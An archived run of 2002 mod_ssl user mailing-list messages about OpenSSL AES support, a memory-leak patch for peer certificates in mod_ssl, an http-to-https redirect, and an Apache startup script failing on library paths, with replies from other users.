Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id B9504194C1
	for ; Tue, 29 Oct 2002 16:01:07 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA18083; Tue, 29 Oct 2002 16:00:30 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web12706.mail.yahoo.com id PAA17944; Tue, 29 Oct 2002 15:59:44 +0100 (MET)
Message-ID: <20021029145939.36789.qmail@web12706.mail.yahoo.com>
Received: from [203.200.195.2] by web12706.mail.yahoo.com via HTTP; Tue, 29 Oct 2002 06:59:39 PST
Date: Tue, 29 Oct 2002 06:59:39 -0800 (PST)
From: Anbuchezhian Chelliah 
Subject: Re: openssl and AES
To: modssl-users@modssl.org
Cc: sunithak@cisco.com
In-Reply-To: <3DBDC43E.629A93D5@cisco.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-2078659828-1035903579=:36436"
X-Sender: Anbuchezhian Chelliah 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
X-MDRemoteIP: 202.54.10.78
X-MDRcpt-To: modssl-users@modssl.org
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Anbuchezhian Chelliah 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

--0-2078659828-1035903579=:36436
Content-Type: text/plain; charset=us-ascii


Hi Sunita,

    Checkout the news about what you have asked. I fear what you have asked is yet to be implemented in the next version 0.9.7

Regards,

Anbu

NEWS 
==== 

This file gives a brief overview of the major changes between each OpenSSL 
release. For more details please read the CHANGES file. 

Major changes between OpenSSL 0.9.6 and OpenSSL 0.9.7: 

o New library section OCSP. 
o Complete rewrite of ASN1 code. 
o CRL checking in verify code and openssl utility. 
o Extension copying in 'ca' utility. 
o Flexible display options in 'ca' utility. 
o Provisional support for international characters with UTF8. 
o Support for external crypto devices ('engine') is no longer 
a separate distribution. 
o New elliptic curve library section. 
o New AES (Rijndael) library section. 
o Change DES API to clean up the namespace (some applications link also 
against libdes providing similar functions having the same name). 
Provide macros for backward compatibility (will be removed in the 
future). 
o Unifiy handling of cryptographic algorithms (software and 
engine) to be available via EVP routines for asymmetric and 
symmetric ciphers. 
o NCONF: new configuration handling routines. 
o Change API to use more 'const' modifiers to improve error checking 
and help optimizers. 
o Finally remove references to RSAref. 
o Reworked parts of the BIGNUM code. 
o Support for new engines: Broadcom ubsec, Accelerated Encryption 
Processing, IBM 4758. 
o PRNG: query at more locations for a random device, automatic query for 
EGD style random sources at several locations. 
o SSL/TLS: allow optional cipher choice according to server's preference. 
o SSL/TLS: allow server to explicitly set new session ids. 
o SSL/TLS: support Kerberos cipher suites (RFC2712). 
o SSL/TLS: allow more precise control of renegotiations and sessions. 
o SSL/TLS: add callback to retrieve SSL/TLS messages. 
o SSL/TLS: add draft AES ciphersuites (disabled unless explicitly requested). 


--- Sunitha Kumar  wrote: 
> Hi, 
> Anyone know if openssl supports AES, essentially, 
> does it support RFC 
> 3268, 
> which is "AES ciphersuites for TLS", 
> 
> thanks, 
> 
> sunitha 
> 
> 
> 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) 
> www.modssl.org 
> User Support Mailing List 
> modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.org 




---------------------------------
Do you Yahoo!?
HotJobs - Search new jobs daily now
--0-2078659828-1035903579=:36436
Content-Type: text/html; charset=us-ascii


Hi Sunita,


    Checkout the news about what you have asked. I fear what you have asked is yet to be implemented in the next version 0.9.7


Regards,


Anbu


NEWS 
==== 

This file gives a brief overview of the major changes between each OpenSSL 
release. For more details please read the CHANGES file. 

Major changes between OpenSSL 0.9.6 and OpenSSL 0.9.7: 

o New library section OCSP. 
o Complete rewrite of ASN1 code. 
o CRL checking in verify code and openssl utility. 
o Extension copying in 'ca' utility. 
o Flexible display options in 'ca' utility. 
o Provisional support for international characters with UTF8. 
o Support for external crypto devices ('engine') is no longer 
a separate distribution. 
o New elliptic curve library section. 
o New AES (Rijndael) library section. 
o Change DES API to clean up the namespace (some applications link also 
against libdes providing similar functions having the same name). 
Provide macros for backward compatibility (will be removed in the 
future). 
o Unifiy handling of cryptographic algorithms (software and 
engine)!
  to be available via EVP routines for asymmetric and 
symmetric ciphers. 
o NCONF: new configuration handling routines. 
o Change API to use more 'const' modifiers to improve error checking 
and help optimizers. 
o Finally remove references to RSAref. 
o Reworked parts of the BIGNUM code. 
o Support for new engines: Broadcom ubsec, Accelerated Encryption 
Processing, IBM 4758. 
o PRNG: query at more locations for a random device, automatic query for 
EGD style random sources at several locations. 
o SSL/TLS: allow optional cipher choice according to server's preference. 
o SSL/TLS: allow server to explicitly set new session ids. 
o SSL/TLS: support Kerberos cipher suites (RFC2712). 
o SSL/TLS: allow more precise control of renegotiations and sessions. 
o SSL/TLS: add callback to retrieve SSL/TLS messages. 
o SSL/TLS: add draft AES ciphersuites (disabled unless explicitly requested). 


--- Sunitha Kumar <sunithak@cisco.com> wrote: 
&g

t; Hi, 
> Anyone know if openssl supports AES, essentially, 
> does it support RFC 
> 3268, 
> which is "AES ciphersuites for TLS", 
> 
> thanks, 
> 
> sunitha 
> 
> 
> 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) 
> www.modssl.org 
> User Support Mailing List 
> modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.org 

Do you Yahoo!?

HotJobs - Search new jobs daily now
--0-2078659828-1035903579=:36436--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 29 16:32:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA19396; Tue, 29 Oct 2002 16:31:18 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id QAA19389; Tue, 29 Oct 2002 16:30:29 +0100 (MET)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9TFUPiX022162;
	Tue, 29 Oct 2002 17:30:25 +0200 (IST)
Received: (from rl@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9TFUOcV022161;
	Tue, 29 Oct 2002 17:30:24 +0200 (IST)
Date: Tue, 29 Oct 2002 17:30:24 +0200
From: "Zvi Har'El" 
To: "Nadav Har'El" 
Cc: modssl-users@modssl.org, geoff@geoffthorpe.net
Subject: Re: Bug fix: leak of peer certificate
Message-ID: <20021029153024.GB19757@fermat.math.technion.ac.il>
References: <20021025220344.GA14812@fermat.math.technion.ac.il>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20021025220344.GA14812@fermat.math.technion.ac.il>
User-Agent: Mutt/1.4i
Hebrew-Date: 23 Heshvan 5763
X-PGP-Public-Key: http://www.math.technion.ac.il/~rl/pubkey.html
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zvi Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 26 Oct 2002 00:03:44 +0200, Nadav Har'El wrote about "Bug fix: leak of peer certificate":
> There is a memory leak in mod_ssl-2.8.11-1.3.27 when client-authentication
> is used. The peer certificates are leaked - as much as 3-4K per request.
> 
> I am enclosing a description of the memory leak, and a suggested patch to
> mod_ssl-2.8.11-1.3.27 to fix it. I'd appreciate if it (or some variant of
> the same idea) will be applied to mod_ssl.
> I haven't yet looked whether the same leak exists in Apache 2 and whether it
> should be fixed there too.
> 
> Thanks to Zvi Har'El for researching and fixing this bug with me.

[snip]

> diff -ur mod_ssl-2.8.11-1.3.27-dist/pkg.sslmod/ssl_engine_kernel.c mod_ssl-2.8.11-1.3.27/pkg.sslmod/ssl_engine_kernel.c
> --- mod_ssl-2.8.11-1.3.27-dist/pkg.sslmod/ssl_engine_kernel.c	2002-10-04 16:30:37.000000000 +0300
> +++ mod_ssl-2.8.11-1.3.27/pkg.sslmod/ssl_engine_kernel.c	2002-10-25 17:33:14.000000000 +0200

[snip]

> @@ -865,11 +866,12 @@
>                  /* optimization */
>                  if (   dc->nOptions & SSL_OPT_OPTRENEGOTIATE
>                      && nVerifyOld == SSL_VERIFY_NONE
> -                    && SSL_get_peer_certificate(ssl) != NULL)
> +                    && (cert = SSL_get_peer_certificate(ssl)) != NULL)
>                      renegotiate_quick = TRUE;
>                  ssl_log(r->server, SSL_LOG_TRACE,
>                          "Changed client verification type will force %srenegotiation",
>                          renegotiate_quick ? "quick " : "");
> +                        X509_free(cert);
>               }
>          }
>      }

I apologize, to err is human, and the last chunk should be a little different :
The X509_free(cert) command should be executed only if the "if" succeeds, i.e., 

                 /* optimization */
                 if (   dc->nOptions & SSL_OPT_OPTRENEGOTIATE
                     && nVerifyOld == SSL_VERIFY_NONE
-                    && SSL_get_peer_certificate(ssl) != NULL)
+                    && (cert = SSL_get_peer_certificate(ssl)) != NULL) {
                     renegotiate_quick = TRUE;
+                        X509_free(cert);
+		 }
                 ssl_log(r->server, SSL_LOG_TRACE,
                         "Changed client verification type will force %srenegotiation",
                         renegotiate_quick ? "quick " : "");
              }
         }
     }
-- 
Dr. Zvi Har'El     mailto:rl@math.technion.ac.il     Department of Mathematics
tel:+972-54-227607                   Technion - Israel Institute of Technology
fax:+972-4-8324654 http://www.math.technion.ac.il/~rl/     Haifa 32000, ISRAEL
"If you can't say somethin' nice, don't say nothin' at all." -- Thumper (1942)
                            Tuesday, 23 Heshvan 5763, 29 October 2002,  5:20PM
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 29 19:34:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA25023; Tue, 29 Oct 2002 19:33:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from conure.mail.pas.earthlink.net id TAA25017; Tue, 29 Oct 2002 19:32:56 +0100 (MET)
Received: from bigbird.mail.pas.earthlink.net ([207.217.120.244] helo=bigbird.psp.pas.earthlink.net)
	by conure.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 186bAc-0002Yl-00
	for modssl-users@modssl.org; Tue, 29 Oct 2002 10:32:54 -0800
Received: (from nobody@localhost)
	by bigbird.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id g9TIWrh01198
	for modssl-users@modssl.org; Tue, 29 Oct 2002 10:32:53 -0800 (PST)
Date: Tue, 29 Oct 2002 10:32:53 -0800
From: "rmckee"
To: modssl-users@modssl.org
Subject: http to https
Message-ID: 
X-Originating-IP: 134.9.11.140
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rmckee"
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Im sure this has been asked but I cant find the answer.

I have Apache/1.3.27 (Unix)mod_ssl/2.8.12 OpenSSL/0.9.6e.

In the httpd.conf can I make an http link go to (redirect) an https link.

So if they click on this link:

http://system.company.com/  
it will direct to 
https://system/ or https://system.company.com/ 

Thanks upfront....
Ron 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 29 19:55:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA25521; Tue, 29 Oct 2002 19:54:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id TAA25517; Tue, 29 Oct 2002 19:53:59 +0100 (MET)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 11BC0BD3C; Tue, 29 Oct 2002 19:55:55 +0100 (CET)
Date: Tue, 29 Oct 2002 19:55:54 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: http to https
Message-ID: <20021029185554.GA25731@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Oct 29, 2002 at 10:32:53AM -0800, rmckee wrote:
> Hello,
> 
> Im sure this has been asked but I cant find the answer.
> 
> I have Apache/1.3.27 (Unix)mod_ssl/2.8.12 OpenSSL/0.9.6e.
> 
> In the httpd.conf can I make an http link go to (redirect) an https link.
> 
> So if they click on this link:
> 
> http://system.company.com/  
> it will direct to 
> https://system/ or https://system.company.com/ 
> 

In your http vhost put:

Redirect / https://system.company.com/

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 30 04:54:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA09800; Wed, 30 Oct 2002 04:53:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sj-msg-core-3.cisco.com id EAA09794; Wed, 30 Oct 2002 04:52:37 +0100 (MET)
Received: from princeton.cisco.com (IDENT:mirapoint@princeton.cisco.com [64.101.71.62])
	by sj-msg-core-3.cisco.com (8.12.2/8.12.2) with ESMTP id g9U3qGxF013202
	for ; Tue, 29 Oct 2002 19:52:26 -0800 (PST)
Received: from CSCOAMERA10315 (dhcp-64-101-69-124.cisco.com [64.101.69.124])
	by princeton.cisco.com (Mirapoint)
	with ESMTP id AAM02102;
	Tue, 29 Oct 2002 20:52:20 -0700 (MST)
From: "Lawrence Cole" 
To: 
Subject: Startup Script
Date: Tue, 29 Oct 2002 20:52:20 -0700
Message-ID: <000201c27fc7$bf1885b0$7c456540@amer.cisco.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0003_01C27F8D.12B9ADB0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lawrence Cole" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0003_01C27F8D.12B9ADB0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Greetings everyone,
 
I realize this situation has come up before, but none of the suggestions
I have seen have worked for me.
 
I have created an Apache 1.3.26 / mod_ssl 2.8.10 server.  No problems
creating it, and no problems starting from the command line.  I am
however, unable to start automatically at boot using a script in the
rc3.d directory.  When I try to start it automatically using:
 
#!/bin/sh
#
# Start SSL-Aware Apache http daemon
#
echo "Start SSL-Aware Apache httpd"
/opt/apache/bin/apachectl startssl
 
 
I get the following error:
 
ld.so.1: /opt/apache/bin/httpd: fatal: libexpat.so.0: open failed: No
such file or directory
Killed
/opt/apache/bin/apachectl startssl: httpd could not be started

Once the system is booted up the LD_LIBRARY_PATH is
"/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib", and I can run
"/opt/apache/bin/apachectl startssl" just fine.  For automation reasons,
I need to boot at startup.  Any suggestions?
 
Regards,
 
Lawrence

------=_NextPart_000_0003_01C27F8D.12B9ADB0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable




Message




Greetings=20
everyone,


 


I =
realize this=20
situation has come up before, but none of the suggestions I have seen =
have=20
worked for me.


 


I have =
created an=20
Apache 1.3.26 / mod_ssl 2.8.10 server.  No problems creating it, =
and no=20
problems starting from the command line.  I am however, unable to =
start=20
automatically at boot using a script in the rc3.d directory.  When =
I try=20
to start it automatically using:


 


#!/bin/sh


#
# =
Start=20
SSL-Aware Apache http daemon
#


echo =
"Start=20
SSL-Aware Apache httpd"
/opt/apache/bin/apachectl=20
startssl


 


 


I get =
the following=20
error:


 


ld.so.1:=20
/opt/apache/bin/httpd: fatal: libexpat.so.0: open failed: No such file =
or=20
directory
Killed
/opt/apache/bin/apachectl startssl: httpd could =
not be=20
started


Once =
the system is=20
booted up the LD_LIBRARY_PATH is=20
"/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib", and I can run=20
"/opt/apache/bin/apachectl startssl" just fine.  For automation =
reasons, I=20
need to boot at startup.  Any suggestions?


 


Regards,


 


Lawrence


------=_NextPart_000_0003_01C27F8D.12B9ADB0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 30 05:36:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA11072; Wed, 30 Oct 2002 05:35:08 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from scanmail2.cableone.net id FAA11064; Wed, 30 Oct 2002 05:34:13 +0100 (MET)
Received: from scanmail2.cableone.net ([10.116.0.122]) by scanmail2.cableone.net  with Microsoft SMTPSVC(5.5.1877.687.68);
	 Tue, 29 Oct 2002 21:15:18 -0700
Received: from scanmail2.cableone.net [24.116.0.122] by scanmail2.cableone.net
  (SMTPD32-7.04) id ACB520F400CC; Tue, 29 Oct 2002 21:14:45 -0700
Received: from  (183-134.twicpe.cableone.net [24.116.183.134]) by mail.cableone.net with SMTP (MailShield v2.04 - WIN32 Jul 17 2001 17:12:42); Tue, 29 Oct 2002 21:14:44 -0700
Message-Id: <5.1.1.6.0.20021029211149.00a3a7a0@mail.developersdesk.com>
X-Sender: apache%developersdesk.com@mail.developersdesk.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Tue, 29 Oct 2002 21:15:39 -0700
To: modssl-users@modssl.org, 
From: Rick Widmer 
Subject: Re: Startup Script
In-Reply-To: <000201c27fc7$bf1885b0$7c456540@amer.cisco.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-SMTP-HELO: robinton.developersdesk.com
X-SMTP-MAIL-FROM: apache@developersdesk.com
X-SMTP-PEER-INFO: 183-134.twicpe.cableone.net [24.116.183.134]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rick Widmer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 08:52 PM 10/29/02 -0700, Lawrence Cole wrote:
>
>ld.so.1: /opt/apache/bin/httpd: fatal: libexpat.so.0: open failed: No such 
>file or directory
>Killed
>/opt/apache/bin/apachectl startssl: httpd could not be started
>Once the system is booted up the LD_LIBRARY_PATH is 
>"/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib", and I can run 
>"/opt/apache/bin/apachectl startssl" just fine.  For automation reasons, I 
>need to boot at startup.  Any suggestions?
>

When in the startup sequence are you starting Apache?  It needs to be very 
late in the process. The only thing I do AFTER starting apache in myh 
startup scripts is run a process that assigns the ailias IP addresses to 
the server.

Without knowing what OS you are using I can't make any suggestions on 
exactly how to fix it, but I'm sure it is a matter of starting Apache late 
in the process.

Rick


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 30 05:39:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA11236; Wed, 30 Oct 2002 05:38:22 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id FAA11128; Wed, 30 Oct 2002 05:37:09 +0100 (MET)
Received: from 202.54.10.78 [202.54.10.78] by sitesontesting.com []
	with DomainPOP (MDaemon.PRO.v5.0.5.R)
	for ; Wed, 30 Oct 2002 10:06:03 +0530
Delivered-To: webmaster@8
Received: (qmail 4121 invoked from network); 29 Oct 2002 18:40:10 -0000
Received: from mmx.engelschall.com (195.27.130.252)
  by 202.54.10.78 with SMTP; 29 Oct 2002 18:40:10 -0000
Received: by mmx.engelschall.com (Postfix)
	id 774E419507; Tue, 29 Oct 2002 19:34:13 +0100 (CET)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 20FAD1949C
	for ; Tue, 29 Oct 2002 19:34:13 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA25023; Tue, 29 Oct 2002 19:33:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from conure.mail.pas.earthlink.net id TAA25017; Tue, 29 Oct 2002 19:32:56 +0100 (MET)
Received: from bigbird.mail.pas.earthlink.net ([207.217.120.244] helo=bigbird.psp.pas.earthlink.net)
	by conure.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 186bAc-0002Yl-00
	for modssl-users@modssl.org; Tue, 29 Oct 2002 10:32:54 -0800
Received: (from nobody@localhost)
	by bigbird.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id g9TIWrh01198
	for modssl-users@modssl.org; Tue, 29 Oct 2002 10:32:53 -0800 (PST)
Date: Tue, 29 Oct 2002 10:32:53 -0800
From: "rmckee" 
To: modssl-users@modssl.org
Subject: http to https
Message-ID: 
X-Originating-IP: 134.9.11.140
X-Sender: "rmckee"
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
X-MDRemoteIP: 202.54.10.78
X-MDRcpt-To: modssl-users@modssl.org
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rmckee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Im sure this has been asked but I cant find the answer.

I have Apache/1.3.27 (Unix)mod_ssl/2.8.12 OpenSSL/0.9.6e.

In the httpd.conf can I make an http link go to (redirect) an https link.

So if they click on this link:

http://system.company.com/  
it will direct to 
https://system/ or https://system.company.com/ 

Thanks upfront....
Ron 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 30 05:39:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA11239; Wed, 30 Oct 2002 05:38:27 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id FAA11160; Wed, 30 Oct 2002 05:37:21 +0100 (MET)
Received: from 202.54.10.78 [202.54.10.78] by sitesontesting.com []
	with DomainPOP (MDaemon.PRO.v5.0.5.R)
	for ; Wed, 30 Oct 2002 10:06:06 +0530
Delivered-To: webmaster@8
Received: (qmail 11346 invoked from network); 29 Oct 2002 19:00:57 -0000
Received: from mmx.engelschall.com (195.27.130.252)
  by 202.54.10.78 with SMTP; 29 Oct 2002 19:00:57 -0000
Received: by mmx.engelschall.com (Postfix)
	id 924AB19528; Tue, 29 Oct 2002 19:55:09 +0100 (CET)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 3A4691949C
	for ; Tue, 29 Oct 2002 19:55:09 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA25521; Tue, 29 Oct 2002 19:54:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id TAA25517; Tue, 29 Oct 2002 19:53:59 +0100 (MET)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 11BC0BD3C; Tue, 29 Oct 2002 19:55:55 +0100 (CET)
Date: Tue, 29 Oct 2002 19:55:54 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: http to https
Message-ID: <20021029185554.GA25731@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
X-MDRemoteIP: 202.54.10.78
X-MDRcpt-To: modssl-users@modssl.org
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Oct 29, 2002 at 10:32:53AM -0800, rmckee wrote:
> Hello,
> 
> Im sure this has been asked but I cant find the answer.
> 
> I have Apache/1.3.27 (Unix)mod_ssl/2.8.12 OpenSSL/0.9.6e.
> 
> In the httpd.conf can I make an http link go to (redirect) an https link.
> 
> So if they click on this link:
> 
> http://system.company.com/  
> it will direct to 
> https://system/ or https://system.company.com/ 
> 

In your http vhost put:

Redirect / https://system.company.com/

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 30 10:23:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA19314; Wed, 30 Oct 2002 10:22:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id KAA19296; Wed, 30 Oct 2002 10:21:26 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id g9U9LKt9022688
	for ; Wed, 30 Oct 2002 10:21:20 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id g9U9LJEm014750
	for ; Wed, 30 Oct 2002 10:21:20 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Startup Script
Date: Wed, 30 Oct 2002 10:21:19 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A477@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Startup Script
Importance: normal
Thread-Index: AcJ/yCPT8Msnj/AvQEKiTxIFw/PTVgALSQLA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Quick fix is to put in the startup script:

LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib

before it tries to start apache..

Better fix is to recompile apache with the additional compile-time
options: "-L/usr/openwin/lib -R/usr/openwin/lib" etc. (one pair for each
lib). This should build the paths to the libs into the binary and then
you don't need LD_LIBRARY_PATH at all.

-----Original Message-----
From: Lawrence Cole [mailto:lmcole@cisco.com]
Sent: Mittwoch, 30. Oktober 2002 04:52
To: modssl-users@modssl.org
Subject: Startup Script


Greetings everyone,

I realize this situation has come up before, but none of the suggestions
I have seen have worked for me.

I have created an Apache 1.3.26 / mod_ssl 2.8.10 server.  No problems
creating it, and no problems starting from the command line.  I am
however, unable to start automatically at boot using a script in the
rc3.d directory.  When I try to start it automatically using:

#!/bin/sh
#
# Start SSL-Aware Apache http daemon
#
echo "Start SSL-Aware Apache httpd"
/opt/apache/bin/apachectl startssl


I get the following error:

ld.so.1: /opt/apache/bin/httpd: fatal: libexpat.so.0: open failed: No
such file or directory
Killed
/opt/apache/bin/apachectl startssl: httpd could not be started

Once the system is booted up the LD_LIBRARY_PATH is
"/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib", and I can run
"/opt/apache/bin/apachectl startssl" just fine.  For automation reasons,
I need to boot at startup.  Any suggestions?

Regards,

Lawrence

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
